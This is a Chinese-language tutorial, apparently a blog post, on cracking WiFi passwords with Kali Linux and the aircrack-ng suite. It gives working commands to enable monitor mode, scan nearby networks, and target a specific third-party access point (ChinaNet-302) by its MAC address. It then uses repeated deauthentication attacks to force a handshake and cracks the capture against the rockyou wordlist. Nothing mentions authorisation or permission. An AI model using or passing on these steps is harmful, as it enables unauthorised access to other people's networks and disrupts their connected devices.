1.准备工作
首先你得有一个外置网卡,然后用虚拟机进行破解
所需要的设备: kali linux 外置网卡
要将虚拟机设置为:桥接模式
然后就是将插入的外接网卡设置为:
然后 ifconfig
看下:
2.开始攻击
接着就进行混合:
并将wlan0网卡开启混杂模式:
sudo airmon-ng start wlan0 //开启wlan0网卡
#提示要杀掉一些进程,根据提示进行即可
sudo airmon-ng check kill
sudo airmon-ng start wlan0
开始抓包:
首先,查看附近WiFi热点,使用命令
sudo airodump-ng wlan0
这里需要说名下我的是wlan0-你们的可能是wlan0mon
选取其中信号较好的WiFi热点,在这里我们选取一个目标(ChinaNet-302)
使用airodump-ng对选取的WiFi热点进行cap监听与获取:
sudo airodump-ng -c 1 --bssid B4:A8:98:A3:77:54 -w ChinaNet-302 wlan0 (注意这个位置不能有空格,哪怕原wifi名字上有,这个地方也不能有)
(//注释sudo airodump-ng -c 1 --bssid (B4:A8:98:A3:77:54)为需要破解WiFi的MAC值 -w ChinaNet-302 wlan0)
-c 通道值 WiFi热点所对应的CH值(上图中可看到)
--bssid 需要破解WiFi的MAC值
-w cap文件名
wlan0 启用混杂模式的网卡名
这个时候看到有2个设备进行了连接,选取一个为B4:69:21:84:F3:D7的进行抓包:(需要一直开启)
使用aireplay-ng 对选取的WiFi热点进行cap监听与获取: (再启动一个命令行)
sudo aireplay-ng -0 2 -c B4:69:21:84:F3:D7 -a B4:A8:98:A3:77:54 wlan0
-0 death模式,2为发送次数
-c 你所选择要断网操作的客户机MAC
-a WiFi热点MAC
有时候一次抓不到,多试几次,我试了三次之后,抓到了:
这个时候监听就可以停止了:
然后就是跑包了:
3.跑包
我们直接使用kali自带的,在文件目录中,需要解压(这里不做演示)
#首先ls查看当前目录所产生的握手包
sudo aircrack-ng -w rockyou.txt ChinaNet-302-01.cap
w代表字典 rockyou.txt //字典在cd /usr/share/wordlists/下
接着你的包名称 A4-3062.4G-02.cap
然后就等结果吧!(其实如果wifi密码复杂的话,基本上很难跑出来)
现在暴力破解的太难了,wifi密码稍微一复杂,基本就无望。
现在使用kali自带的aircrack好像已经过时了,我在网上看到有更好、能跑GPU的工具了,具体的名字忘了,大家可以自行搜索,另外很多人再问我的无线网卡的型号,我的记得就30左右,不用买太好的,一般的就行:
最重要的还是字典问题,当然还有一种破解的方法是对pin包检测,但是那种方法只适合更老的路由器设备,现在的路由器基本上都可以防pin了,所以在这里就不再演示了。